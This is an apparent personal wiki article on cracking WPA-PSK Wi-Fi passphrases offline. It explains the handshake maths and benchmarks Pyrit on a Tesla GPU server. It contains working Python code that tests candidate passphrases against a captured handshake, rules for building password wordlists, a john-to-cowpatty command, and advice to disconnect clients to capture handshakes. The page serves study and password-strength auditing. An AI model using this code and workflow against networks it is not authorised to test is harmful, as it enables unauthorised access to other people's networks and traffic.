WPA Attack
WPA is the successor to WEP, created to fill the need for a secure replacement after the flaws in WEP encryption were fully disclosed.
Background
Most wireless networks operating today use WPA with a Pre-Shared Key (PSK), i.e. a common password shared between the Access Point and the client station, for protection. While the 802.11i standard, on which WPA is based, is still intact, the PSK authentication is prone to an offline brute-force attack.
4-Way handshake
When a client wants to connect to an access point, the following simplified stages take place:
- The client takes the password and ESSID of the network to compute a Pairwise Master Key and sends a request to the AP asking to connect
- The AP responds with a random ANonce number
- The client creates a random SNonce number and takes the Pairwise Master Key, ANonce, SNonce, and the AP and client MAC addresses to compute a Pairwise Transient Key
- The client signs the SNonce number using the Pairwise Transient Key and sends it unencrypted to the AP
- The AP receives the signed SNonce and computes the Pairwise Master Key from its own password and ESSID. It then uses the Pairwise Master Key, ANonce, SNonce, and the AP and client MAC addresses to compute a Pairwise Transient Key
- By signing the SNonce message with its own Pairwise Transient Key, the AP can compare the resulting Integrity Code with the Integrity Code of the SNonce message sent by the client
- If they are the same, the AP can assume the client used the same Pairwise Master Key (password + ESSID) to generate the Pairwise Transient Key that was subsequently used to sign the message
- The AP sends an acknowledgment to the client, signed with the Pairwise Transient Key, that includes information for further communication
For an excellent explanation, see the Airolib-ng manual.
Key generation
The PMK is generated using the following relatively processor-intensive function (pseudo code):
- PMK = PBKDF2(passphrase, ssid, ssidLength, 4096, 256)
Where PBKDF2 is the key derivation function from PKCS #5 v2.0: Password-Based Cryptography Standard. For WPA it uses HMAC-SHA1 with the passphrase as the key and the SSID as the salt, iterated 4096 times to generate a value of 256 bits. The lengths of the passphrase and the SSID have little impact on the speed of this operation [1].
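The PMK pseudo code above can be sketched in Python with the standard library alone. This is a minimal illustration, not the code used by coWPAtty or Pyrit; the function name derive_pmk and the example passphrase and SSID are assumptions made for the example.

```python
import hashlib


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the 256-bit Pairwise Master Key for WPA-PSK.

    PBKDF2 with HMAC-SHA1: the passphrase is the password, the SSID is the
    salt, 4096 iterations, 32 bytes (256 bits) of output.
    """
    return hashlib.pbkdf2_hmac(
        "sha1",
        passphrase.encode("utf-8"),
        ssid.encode("utf-8"),
        4096,
        dklen=32,
    )


if __name__ == "__main__":
    # Hypothetical example values, not taken from the text above.
    print(derive_pmk("password", "IEEE").hex())
```

Because the SSID acts as the salt, the same passphrase yields a different PMK on every differently named network.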
The PTK is generated using this less processor-intensive function (pseudo code):
- PTK = PRF-512(PMK, "Pairwise key expansion", Min(AP_Mac, Client_Mac) || Max(AP_Mac, Client_Mac) || Min(ANonce, SNonce) || Max(ANonce, SNonce))
The PTK is derived with a keyed HMAC function, using the PMK as the key over the two MAC addresses and the two nonces from the first two packets of the 4-way handshake [2].
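A rough Python sketch of the PTK derivation follows. It assumes the usual 802.11i construction of PRF-512, i.e. HMAC-SHA1 blocks over label, a zero byte, the data and a counter byte, concatenated and cut to 64 bytes. The function names prf and derive_ptk are illustrative only.

```python
import hashlib
import hmac

LABEL = b"Pairwise key expansion"


def prf(key: bytes, label: bytes, data: bytes, n_bytes: int) -> bytes:
    """Concatenate HMAC-SHA1(key, label || 0x00 || data || counter) blocks."""
    out = b""
    counter = 0
    while len(out) < n_bytes:
        message = label + b"\x00" + data + bytes([counter])
        out += hmac.new(key, message, hashlib.sha1).digest()
        counter += 1
    return out[:n_bytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes,
               anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 over the sorted MAC addresses and the sorted nonces."""
    # Comparing equal-length byte strings orders them like big-endian numbers.
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, LABEL, data, 64)
```

Sorting the addresses and nonces with Min/Max means both sides compute the same PTK regardless of which one considers itself "first".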
- MIC = HMAC_MD5(MIC Key, 16, 802.1x data)
A MIC value is then calculated over the EAPoL message, using the MIC Key (the first 16 bytes of the PTK).
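The MIC step might look like this in Python. It is a sketch under stated assumptions: the MIC field is taken to sit at byte offset 81 of the EAPoL-Key frame (counted from the 802.1X header) and is zeroed before hashing, HMAC-MD5 is used for WPA, and HMAC-SHA1 truncated to 16 bytes for WPA2. The names eapol_mic and zero_mic_field are made up for the example.

```python
import hashlib
import hmac

MIC_OFFSET = 81   # assumption: MIC position inside the EAPoL-Key frame
MIC_LENGTH = 16


def zero_mic_field(eapol_frame: bytes) -> bytes:
    """Return the frame with its MIC field replaced by zero bytes."""
    return (eapol_frame[:MIC_OFFSET]
            + bytes(MIC_LENGTH)
            + eapol_frame[MIC_OFFSET + MIC_LENGTH:])


def eapol_mic(ptk: bytes, eapol_frame: bytes, wpa2: bool = False) -> bytes:
    """Compute the 16-byte MIC over an EAPoL-Key frame."""
    mic_key = ptk[:16]  # the "MIC Key" is the first 16 bytes of the PTK
    digest = hashlib.sha1 if wpa2 else hashlib.md5
    mac = hmac.new(mic_key, zero_mic_field(eapol_frame), digest)
    return mac.digest()[:MIC_LENGTH]
```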
Generating the PMK using the PBKDF2 function is slow and costly, so it can be pre-computed as a time-memory trade-off. Both coWPAtty and Pyrit can create these hash tables. Pyrit is especially fast because it uses the GPGPU concept to speed up the process; see the Pyrit project page for the difference.
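The idea of pre-computation can be illustrated with a small Python sketch. It is not the on-disk format of coWPAtty or Pyrit, just an in-memory dictionary, and build_pmk_table is a hypothetical name. The 8 to 63 character filter reflects the WPA-PSK passphrase length limits.

```python
import hashlib


def build_pmk_table(ssid: str, passphrases) -> dict:
    """Pre-compute passphrase -> PMK for one specific SSID."""
    table = {}
    for word in passphrases:
        if 8 <= len(word) <= 63:  # valid WPA-PSK passphrase lengths
            table[word] = hashlib.pbkdf2_hmac(
                "sha1", word.encode("utf-8"), ssid.encode("utf-8"), 4096, 32
            )
    return table


if __name__ == "__main__":
    # Hypothetical SSID and word list for illustration.
    table = build_pmk_table("default", ["hellohello", "password1", "short"])
    print(len(table), "PMKs stored")
```

Since the SSID is the salt, a table built for one SSID is useless for any other, which is why pre-computed sets are organised per ESSID.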
Details:
- PSK as the Key Establishment Method
- WPA Passive Dictionary Attack Overview
- Wireless Security WPA discussion thread
- Computing the Temporal Keys
- Cracking Wi-Fi Protected Access (WPA), Part 2, Page 6
- The Many Paths of Wi-Fi Security
Attack
An offline attack on the functions above is possible by disassociating any connected client(s), capturing a full 4-way handshake session when the client(s) reconnect, and then extracting the AP MAC, client MAC, ANonce and SNonce. The SSID is already known.
With the above information it is possible to brute-force the passphrase by computing the 4-way handshake as described above (calculate the PMK, then the PTK, and subsequently sign the SNonce message to get the Integrity Code) for every candidate passphrase combined with the SSID. If the passphrase is correct, the computed Integrity Code will match the captured Integrity Code.
See the coWPAtty and Pyrit source code for examples of the handshake process.
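The verification loop described above can be sketched as follows, for auditing a passphrase on a network you administer. This is a simplified illustration rather than how coWPAtty or Pyrit are written: it assumes a WPA (HMAC-MD5) handshake, assumes the EAPoL frame is passed in with its MIC field already zeroed, and all function names are invented for the example.

```python
import hashlib
import hmac

LABEL = b"Pairwise key expansion"


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce) -> bytes:
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for counter in range(4):  # four 20-byte SHA-1 blocks cover 64 bytes
        out += hmac.new(pmk, LABEL + b"\x00" + data + bytes([counter]),
                        hashlib.sha1).digest()
    return out[:64]


def compute_mic(ptk: bytes, eapol_frame: bytes) -> bytes:
    # Assumption: eapol_frame already has its MIC field set to zero.
    return hmac.new(ptk[:16], eapol_frame, hashlib.md5).digest()


def find_passphrase(candidates, ssid, ap_mac, sta_mac, anonce, snonce,
                    eapol_frame, captured_mic):
    """Return the first candidate whose computed MIC matches, else None."""
    for word in candidates:
        ptk = derive_ptk(derive_pmk(word, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(compute_mic(ptk, eapol_frame), captured_mic):
            return word
    return None


if __name__ == "__main__":
    # Synthetic handshake values, generated here instead of captured.
    ssid, ap, sta = "testnet", bytes(6), bytes([1]) * 6
    an, sn, frame = bytes([2]) * 32, bytes([3]) * 32, bytes(99)
    mic = compute_mic(derive_ptk(derive_pmk("hellohello", ssid), ap, sta, an, sn), frame)
    print(find_passphrase(["12345678", "hellohello"], ssid, ap, sta, an, sn, frame, mic))
```

Nearly all of the time per candidate is spent in derive_pmk, which is the step the pre-computed tables remove.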
Counter-measures
As explained above, a long, random alphanumeric password will thwart this dictionary attack. Use something like the kurtm.net WPA-PSK generator or, preferably, the Yubico USB key adapter to generate a truly random password.
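To put a number on why length and randomness matter, the following back-of-the-envelope Python calculation estimates how long an exhaustive search would take. It assumes a truly random password and borrows the roughly 28,000 PMKs/s benchmark figure from the performance measurements in this article; the function name is illustrative.

```python
SECONDS_PER_YEAR = 365 * 24 * 3600


def exhaustive_search_years(alphabet_size: int, length: int,
                            pmks_per_second: float) -> float:
    """Years needed to try every password of the given length."""
    keyspace = alphabet_size ** length
    return keyspace / pmks_per_second / SECONDS_PER_YEAR


if __name__ == "__main__":
    # 62 symbols = a-z, A-Z and 0-9; rate assumed from the benchmark section.
    for length in (8, 10, 12):
        years = exhaustive_search_years(62, length, 28131)
        print(f"{length} random alphanumeric characters: {years:.3g} years")
```

Even the minimum length of 8 random alphanumeric characters works out to centuries at that rate, and every extra character multiplies the effort by 62. Dictionary words get no such protection.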
Tools
- pyrit - blog - Reference manual - Code details
- Like coWPAtty and Airolib-ng
- Pre-compute PMK keys
- Import compressed (.gz) files
- Supports stdin (i.e. John the Ripper piping)
- Internal database of precomputed ESSID and PMK combinations
- Export PMK to coWPAtty (*.cow ) and Airolib-ng (*.db) supported files
- GPGPU acceleration
- Strip out 4-way handshake from capture file
- coWPAtty - coWPAtty project page - Readme
- Like Pyrit and Airolib-ng
- WPA-PSK attack on specific ESSID and captured 4-way handshake dump
- Passthrough from Pyrit possible (GPGPU acceleration)
- Pre-computed PMK tables supported
- genpmk:
- Generate "Pairwise Master Key" table for a specific ESSID, PMK tables
- Table-file name should end with *.cow
- Airolib-ng
- Like coWPAtty and Pyrit
- Precompute PMK keys and attack WPA/WPA2 handshake captures
- Internal SQLite3 database
- Can export and import coWPAtty files
Extra:
- Church of Wifi wpa-psk rainbow tables
- Pre-computed PMK key tables, 1 million words computed for the top 1000 SSIDs
- 7 and 33 GB torrents
- Hak5 single tables downloads
Drivers
The Alfa AWUS036H adapter is a really good 500 mW USB device based on the RTL8187 chipset, but the drivers are/were buggy. Currently, as of September 2009, it seems that the Compat Wireless rtl8187/mac80211 framework drivers are the most stable and reliable for general use and the old r8187/ieee80211 drivers are most suitable for the Aircrack-ng suite and frame injection [3]. See the tutorial link below for details on how to switch between the drivers.
I can confirm that the latest rtl8187/mac80211 drivers are slow. Packet injection using the same device in Backtrack 3 (BT3) was much faster than in Backtrack 4 (BT4) pre-final. I am unsure of the cause, but it seems that the latest drivers lack a speed patch used previously (see thread below). BT3 uses the r8187/ieee80211_rtl stack, while BT4 uses the main kernel rtl8187/mac80211 stack with some patches already applied (the BT4 Beta, not Pre-final, had some rtl8187/mac80211 speed improvements applied).
Summary to install the BT4 r8187/ieee80211 (r8187-drivers) driver package:
    aptitude search r8187   # look for the kernel version the driver was compiled for, and install it:
    aptitude install linux-image-2.6.30.5 linux-source-2.6.30.5
    dpkg --force-overwrite -i /var/cache/apt/archives/linux-image-2.6.30.5_2.6.30.5-10.00.Custom_i386.deb   # if it reports firmware files already exists
    reboot   # to load new kernel
    sudo rmmod rtl8187
    sudo rmmod mac80211
    echo "blacklist rtl8187" | sudo tee -a /etc/modprobe.d/blacklist
    echo "blacklist r8187" | sudo tee -a /etc/modprobe.d/blacklist
    echo "blacklist rt2870sta" | sudo tee -a /etc/modprobe.d/blacklist
    echo "blacklist mac80211" | sudo tee -a /etc/modprobe.d/blacklist
    aptitude install r8187-drivers
    modprobe r8187
- TUTORIAL: Installing drivers RTL8187, r8187, RT2800usb on UBUNTU
- rtl8187 injection speed patches on linux-2.6.29
- Mac80211 to ieee80211
Word lists
List of word lists
These are compiled word lists and readily available.
- Church of Wifi wordlists - passwords2 (2.1 MB) and 9-final-wordlist (11 MB)
- Outpost9.com (direct) - dic-0294 (8.04 MB) (reference)
- Openwall wordlists - Multiple languages, small fee [4]
- The Argon various wordlists - There are WPA versions of these lists, see Xploitz below
- Xploitz Master Password Collection
- Huegel's Cracking Dictionary Compilation - Cleaned-up version of Xploitz list
Generating word lists
By following simple guidelines a good word-list can be generated. Consider the following [5]:
- Most people use easy-to-remember passwords; for WPA the password has to be at least 8 characters long
- A digit 0-9 is often appended to the word, i.e. (word)1, (word)2, (word)3, ..
- Sequences of numbers are often used, e.g. 123, 321, 999, ..
- The first letter is often upper-case
- Short words (under 8 characters) are often repeated twice in a row, e.g. googlegoogle, hellohello, openopen, ..
- Forename and surname are often used
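The guidelines above translate fairly directly into a small generator. The Python sketch below is only an illustration of those rules, not a replacement for a real rules engine; the function name mangle and the exact suffix lists are assumptions.

```python
DIGIT_SUFFIXES = [str(d) for d in range(10)]   # (word)0 .. (word)9
SEQUENCE_SUFFIXES = ["123", "321", "999"]      # common number sequences


def mangle(words, min_len=8, max_len=63):
    """Yield unique candidate passphrases derived from a base word list."""
    suffixes = [""] + DIGIT_SUFFIXES + SEQUENCE_SUFFIXES
    seen = set()
    for raw in words:
        base = raw.strip()
        if not base:
            continue
        # Plain form and first-letter-upper-case form.
        forms = [base, base[0].upper() + base[1:]]
        # Short words are often doubled to reach the minimum length.
        if len(base) < min_len:
            forms.append(base + base)
        for form in forms:
            for suffix in suffixes:
                candidate = form + suffix
                if min_len <= len(candidate) <= max_len and candidate not in seen:
                    seen.add(candidate)
                    yield candidate


if __name__ == "__main__":
    for candidate in mangle(["google", "password"]):
        print(candidate)
```

Because it is a generator, the output can be streamed to standard output and piped into another tool without storing the expanded list.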
John the Ripper (JTR) and Raptor 3 are great utilities for creating all the permutations mentioned above. JTR has an extended rules engine to build the permutations, and it can pipe the data to another tool to avoid having to save the new stream.
    john -wordfile:dictfile -rules -session:johnrestore.dat -stdout:63 | \
        cowpatty -r eap-test.dump -f - -s somethingclever
[6]
Tools
GPU acceleration
CUDA (Compute Unified Device Architecture) is a parallel computing architecture developed by nVidia [7]. The competing FireStream / Fire Processor is a stream processor developed by ATI Technologies. Both are based on the GPGPU (General-Purpose computing on Graphics Processing Units) concept for heavy floating-point computations [8]. Instead of having four or eight threads crunching on a parallelized task in the CPU, you could have 64, 320, or however many stream processors (Unified Shaders) tackling the same work in the GPU [9].
Traditionally the GPU has been very limited, only accelerating part of the graphics pipeline. Using the GPU for highly parallel floating-point computations can be orders of magnitude faster than using a modern CPU. It is possible to achieve over a teraflop of theoretical computing capacity using relatively inexpensive commodity hardware.
As a side note, SLI cannot be used, only individual processor units.
- List of CUDA enabled nVidia video cards
- List of AMD/ATI Stream processor line-up
- nitteo's gigant F@H GPU2 FARM
- Manifold nVidia CUDA review
- Tom's Hardware: Look at Nvidia CUDA
Practical attack
Handy commands
Connect to OPEN network:
    ifconfig wlan0 down
    iwconfig wlan0 mode managed
    iwconfig wlan0 essid SMC
    dhclient wlan0 -d
Connect to WEP protected network:
    ifconfig wlan0 down
    iwconfig wlan0 mode managed
    iwconfig wlan0 enc (40/104bit key)
    iwconfig wlan0 essid SMC
    dhclient wlan0 -d
Performance measurements
SuperMicro Tesla GPU server
After a few queries I was fortunate enough to get access to a SuperMicro Dual Tesla C1060 GPU rack server. I could borrow it for 10 days to perform benchmarking and general testing of the hardware. Special thanks to Geir over at Nextron for the generosity!
- SuperMicro Tesla GPU Server running Pyrit - Video tour of setup
Server configuration: SuperServer 6016GT-TF-TM2, 2x Tesla C1060 cards, Xeon X5560 quad-core 2.8 GHz, 12 GB RAM, WD VelociRaptor 300 GB, 1000 W PSU, and 16 screeching fans. Perfect for building a cluster. The quality of this thing is outstanding, as is the price.
    root@bt:~/pyrit# hdparm -tT /dev/sda
    /dev/sda:
     Timing cached reads: 15464 MB in 2.00 seconds = 7740.52 MB/sec
     Timing buffered disk reads: 368 MB in 3.01 seconds = 122.19 MB/sec
    root@bt:/mnt/pyr/pyrit# ls -lh files/*cow|wc -l
    1000
    root@bt:/mnt/pyr/pyrit# du -hs files/
    39G files/
    root@bt:/mnt/pyr/pyrit# cat passwords.txt|wc -l
    996358
    root@bt:/mnt/pyr/pyrit# cat essid_list.txt|wc -l
    1000
    root@bt:/mnt/pyr/pyrit# lspci|grep -i Tesla
    02:00.0 3D controller: nVidia Corporation GT200 [Tesla C1060 / Tesla S1070] (rev a1)
    03:00.0 3D controller: nVidia Corporation GT200 [Tesla C1060 / Tesla S1070] (rev a1)
    root@bt:/mnt/pyr/pyrit# cat /proc/cpuinfo|grep Xeon
    model name : Intel(R) Xeon(R) CPU X5560 @ 2.80GHz
    model name : Intel(R) Xeon(R) CPU X5560 @ 2.80GHz
    model name : Intel(R) Xeon(R) CPU X5560 @ 2.80GHz
    model name : Intel(R) Xeon(R) CPU X5560 @ 2.80GHz
    model name : Intel(R) Xeon(R) CPU X5560 @ 2.80GHz
    model name : Intel(R) Xeon(R) CPU X5560 @ 2.80GHz
    model name : Intel(R) Xeon(R) CPU X5560 @ 2.80GHz
    model name : Intel(R) Xeon(R) CPU X5560 @ 2.80GHz
    root@bt:/mnt/pyr/pyrit# pyrit|grep Lukas
    Pyrit 0.2.3 (C) 2008, 2009 Lukas Lueg http://pyrit.googlecode.com
    root@bt:/mnt/pyr/pyrit# uname -r
    2.6.30.5
Power usage, peak:
236V, 2.51A, 50Hz, (equals ~575-592Watt during load)
Now for the more interesting part. Pyrit was the first GPU-accelerated WPA-PSK key generation utility. It supports both Nvidia CUDA and ATI Stream Processor cores, in addition to regular CPUs. The tests below are a synthetic benchmark and a real batch run.
    root@bt:~/pyrit# pyrit benchmark
    Pyrit 0.2.3 (C) 2008, 2009 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3
    Running benchmark for at least 60 seconds...
    #1: 'CUDA-Device #1 'Tesla C1060': 12146.7 PMKs/s (Occ. 95.2%; RTT 2.6)
    #2: 'CUDA-Device #2 'Tesla C1060': 12155.2 PMKs/s (Occ. 95.8%; RTT 2.8)
    #3: 'CPU-Core (SSE2)': 632.6 PMKs/s (Occ. 98.6%; RTT 3.0)
    #4: 'CPU-Core (SSE2)': 637.1 PMKs/s (Occ. 94.1%; RTT 3.0)
    #5: 'CPU-Core (SSE2)': 636.8 PMKs/s (Occ. 93.9%; RTT 3.0)
    #6: 'CPU-Core (SSE2)': 637.3 PMKs/s (Occ. 98.2%; RTT 3.0)
    #7: 'CPU-Core (SSE2)': 643.8 PMKs/s (Occ. 93.5%; RTT 3.0)
    #8: 'CPU-Core (SSE2)': 642.0 PMKs/s (Occ. 93.1%; RTT 3.0)
    Benchmark done. 28131 PMKs/s total.
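To see how the work is split between the GPUs and the CPU cores, the per-device figures from the benchmark output above can be tallied with a few lines of Python. The rates are copied from that output; the variable names are only for illustration.

```python
# (kind, PMKs/s) per device, copied from the pyrit benchmark output.
devices = [
    ("GPU", 12146.7), ("GPU", 12155.2),
    ("CPU", 632.6), ("CPU", 637.1), ("CPU", 636.8),
    ("CPU", 637.3), ("CPU", 643.8), ("CPU", 642.0),
]

gpu = [rate for kind, rate in devices if kind == "GPU"]
cpu = [rate for kind, rate in devices if kind == "CPU"]

total = sum(gpu) + sum(cpu)
gpu_share = sum(gpu) / total
gpu_vs_core = (sum(gpu) / len(gpu)) / (sum(cpu) / len(cpu))

print(f"total: {total:.1f} PMKs/s")
print(f"GPU share of the work: {gpu_share:.1%}")
print(f"one Tesla C1060 vs one CPU core: {gpu_vs_core:.1f}x")
```

The sum agrees with the total reported by Pyrit, and the two Tesla cards account for the large majority of the throughput.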
In regular batch mode the PMKs/second is a little lower.
    root@bt:/mnt/pyr/pyrit# pyrit -f "default.cow" -e "default" batch
    Pyrit 0.2.3 (C) 2008, 2009 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3
    The ESSID-blobspace seems to be empty; you should create an ESSID...
    Working on ESSID 'default'
    Computed 769976 PMKs so far; 25940 PMKs per second; 133785 passwords buffered.
    Stopped reading workunits...
    Computed 991934 PMKs so far; 26131 PMKs per second; 0 passwords buffered.ed...
    All done. 26229.04 PMKs/s total.
    #1: 'CUDA-Device #1 'Tesla C1060': 11889.1 PMKs/s (Occ. 98.1%; RTT 2.3)
    #2: 'CUDA-Device #2 'Tesla C1060': 11851.0 PMKs/s (Occ. 92.9%; RTT 2.2)
    #3: 'CPU-Core (SSE2)': 624.1 PMKs/s (Occ. 92.9%; RTT 2.5)
    #4: 'CPU-Core (SSE2)': 642.2 PMKs/s (Occ. 99.5%; RTT 2.5)
    #5: 'CPU-Core (SSE2)': 632.6 PMKs/s (Occ. 92.8%; RTT 2.5)
    #6: 'CPU-Core (SSE2)': 635.6 PMKs/s (Occ. 93.8%; RTT 2.5)
    #7: 'CPU-Core (SSE2)': 607.0 PMKs/s (Occ. 94.7%; RTT 2.6)
    #8: 'CPU-Core (SSE2)': 631.3 PMKs/s (Occ. 93.3%; RTT 2.5)
    Batchprocessing done.
I decided to do an extended test run to see how it would compare to other systems, more specifically to the pre-computed Church of Wifi WPA-PSK tables. The team computed that set using coWPAtty on a 15-card FPGA setup. At the time it was completed in 3 days at 9000 PMK/s. This was before the GPU-accelerated clients were available.
For the test below I used the same 1 million word password list and 1000 ESSID access point names. The test was done in terminal without X Window running.
The loop script completed after 650 minutes (10 hours and 50 minutes)! Size of the resulting set was 39GB, exactly the size of the Church of Wifi set.
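As a sanity check, the effective throughput of the whole run can be worked out from the figures already given: 996358 passwords, 1000 ESSIDs and 650 minutes. The short Python calculation below does just that and compares the result with the 26229.04 PMKs/s reported for a single batch run; the variable names are illustrative.

```python
passwords = 996_358      # lines in passwords.txt
essids = 1000            # lines in the ESSID list
minutes = 650            # wall-clock time of the loop script
batch_rate = 26229.04    # PMKs/s reported by a single pyrit batch run

total_pmks = passwords * essids
effective_rate = total_pmks / (minutes * 60)
overhead = 1 - effective_rate / batch_rate

print(f"PMKs computed: {total_pmks:,}")
print(f"effective rate: {effective_rate:.0f} PMKs/s")
print(f"lost to per-ESSID setup, export and cleanup: {overhead:.1%}")
```

The effective rate lands slightly below the single-batch figure, which is plausible given that the script exports a file and cleans the blobspace after every ESSID.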
This is the script I used to run the test. To get the execution timing details, put time before the script, i.e. time ./start.sh. Also, make sure the input files don't contain any DOS/Windows carriage return characters; remove them using the dos2unix command.
    #!/bin/bash
    pyrit_prefs="/home/ivc/.pyrit"
    echo -e "Cleaning .pyrit directory..."
    rm -frI $pyrit_prefs/blobspace/
    dos2unix passwords.txt
    pyrit -i passwords.txt import_passwords
    dos2unix essids.txt
    lines=`cat essids.txt|wc -l`
    for (( i = 1; i <= $lines; i++ ))
    do
        essid=`tail -$i essids.txt|head -1`
        if [ -n "$essid" ]; then
            echo -e "Run #$i - ESSID: $essid - Now processing...\n"
            pyrit -o "$essid.cow" -e "$essid" batch
            echo -e "Done - Exported to $essid.cow. Cleaning essid blobspace...\n\n"
            rm -fr $pyrit_prefs/blobspace/essid/
        fi
    done
Check the Pyrit setup guide for an installation reference.
References
- Cracking WPA FAST with video cards - Forum post
- Remote-Exploit forums - Great community and resource
- Benefits of Time-Memory Trade-Off in coWPAtty
- Creating custom password lists from webpages
- pyrit CUDA nvidia Tutorial and Nvidia overclock instructions - PDF version
- BT4 (pre)final ATI guide
- WPA cracking with AMD Stream and a Radeon HD4870 by Znuh
- nitteo's gigant F@H GPU2 FARM
- Cracking Wi-Fi Protected Access (WPA), Part 2 - excellent article